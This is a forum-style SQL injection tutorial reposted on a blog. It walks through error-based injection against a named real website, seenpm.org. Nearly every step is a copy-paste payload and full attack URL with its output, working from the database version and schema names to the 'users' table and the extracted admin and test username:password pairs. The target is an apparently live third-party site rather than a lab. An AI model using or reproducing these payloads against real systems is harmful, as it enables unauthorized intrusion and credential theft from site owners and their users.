[TUTORIAL]Union-Error Based SQLi a.k.a Error Based type 2 [Pics/Details/Video]

Hey guys,
It's Zer0 and I'll be explaining another type of Error Based SQL injection.
It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.

So let's get started

In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):

Code:

http://www.seenpm.org/

The vulnerable link would be:

Code:

http://www.seenpm.org/new/index.php?id=151'

Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully

Code:

count(*) = Returns the total number of records in the table/view
group by = Groups the result of the query set by one or more columns
concat = shows the results in one column
information_schema = The default database
table_schema = Specified database
table_name = The current table name
limit = Limits the amount of content to be displayed
mid() = Used to extract characters from a text field

See more of the functions here:
http://www.w3schools.com/sql/sql_functions.asp

---

NOTE: Make sure to organize the query if you're just gonna copy and paste!
There could be some spaces in between
Getting the version of their database (2 main ways to do it):
First way:
Query:

Code:

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

Results:

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

Second way:
Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ ​schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f ​rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

Screenshot:

Spoiler (Click to Hide)

---

Now that we've got the version, let's extract the database:

Query used:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f ​rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL will look like this:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche ​ma_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'

Note: Notice the limit 0,1),1,150)
This is the part where I raised the ascii from 25 to 150, just in case there would have been more database
I'll explain more about the mid() function in the next step

Screenshot:

Spoiler (Click to Hide)

We have the database and version so far

---

Now for the tables in their current database

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr ​om+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl ​e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

'links,members,menu,menu_s1' for key 'group_key'

Now read this carefully, notice how the tables aren't completely shown.
Only about half of em are shown. This is because of the mid() function we're using.

Leave the limit 0,1 function and don't touch it

What you need to alter now is the integers of the mid() function
i.e (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche ​ma.tables where table_schema=database() limit+0,1),1,25)

Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that
Now, the number "1" shows the tables as soon as it's being altered.
Incrementing is what's being needed here
Lets just say, 15,25
It'll display the rest of the other tables

I've done a bit of a reckon on the site and found out that the 'users' table is located at 58,25

So the query with the URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl ​e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'

Screenshot:

Spoiler (Click to Hide)

---

Now for the columns in the specified table i.e users

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f ​rom+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Notice you have to convert the current table to Hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu ​mn_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Now notice the mid() function
I've incremented from 1,25 to 4,25

Result:

Code:

'username,password,email,n1' for key 'group_key'

Screenshot:

Spoiler (Click to Hide)

---

Now to extract the data from the desired columns
Columns we have so far: "username", "password"

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ ​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo ​rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select ​ +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user ​name,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x

Results:

Code:

Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'

Notice how I didn't increment the mid() function
This because the content is completely shown
Note: You can know that the data is completely shown when there is a ~ sign or signs

Screenshot:

---

Video Demonstration Below:

Penulis : ZentrixPlus ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel [TUTORIAL]Union-Error Based SQLi a.k.a Error Based type 2 [Pics/Details/Video] ini dipublish oleh ZentrixPlus pada hari Monday, April 16, 2012. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 41 komentar: di postingan [TUTORIAL]Union-Error Based SQLi a.k.a Error Based type 2 [Pics/Details/Video]